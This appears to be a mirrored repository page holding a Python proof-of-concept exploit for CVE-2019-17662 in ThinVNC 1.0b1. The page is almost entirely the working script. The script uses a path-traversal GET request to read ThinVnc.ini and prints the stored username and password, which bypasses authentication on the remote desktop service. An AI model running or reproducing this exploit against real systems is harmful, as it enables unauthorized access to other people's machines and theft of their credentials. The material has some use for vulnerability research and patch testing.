mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-07-10 00:13:39 +00:00
52 lines
1.2 KiB
Markdown
52 lines
1.2 KiB
Markdown
![]() |
## ThinVNC 1.0b1 - Authentication Bypass
|
||
|
|
||
|
## 简介
|
||
|
|
||
|
ThinVNC是一款基于HTML5和AJAX的远程桌面实现
|
||
|
|
||
|
## POC
|
||
|
|
||
|
```python
|
||
|
# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
|
||
|
# Date: 2019-10-17
|
||
|
# Exploit Author: Nikhith Tumamlapalli
|
||
|
# Contributor WarMarX
|
||
|
# Vendor Homepage: https://sourceforge.net/projects/thinvnc/
|
||
|
# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
|
||
|
# Version: 1.0b1
|
||
|
# Tested on: Windows All Platforms
|
||
|
# CVE : CVE-2019-17662
|
||
|
|
||
|
# Description:
|
||
|
# Authentication Bypass via Arbitrary File Read
|
||
|
|
||
|
#!/usr/bin/python3
|
||
|
|
||
|
import sys
|
||
|
import os
|
||
|
import requests
|
||
|
|
||
|
def exploit(host,port):
|
||
|
url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
|
||
|
r = requests.get(url)
|
||
|
body = r.text
|
||
|
print(body.splitlines()[2])
|
||
|
print(body.splitlines()[3])
|
||
|
|
||
|
|
||
|
|
||
|
def main():
|
||
|
if(len(sys.argv)!=3):
|
||
|
print("Usage:\n{} <host> <port>\n".format(sys.argv[0]))
|
||
|
print("Example:\n{} 192.168.0.10 5888")
|
||
|
else:
|
||
|
port = sys.argv[2]
|
||
|
host = sys.argv[1]
|
||
|
exploit(host,port)
|
||
|
|
||
|
if __name__ == '__main__':
|
||
|
main()
|
||
|
|
||
|
```
|
||
|
|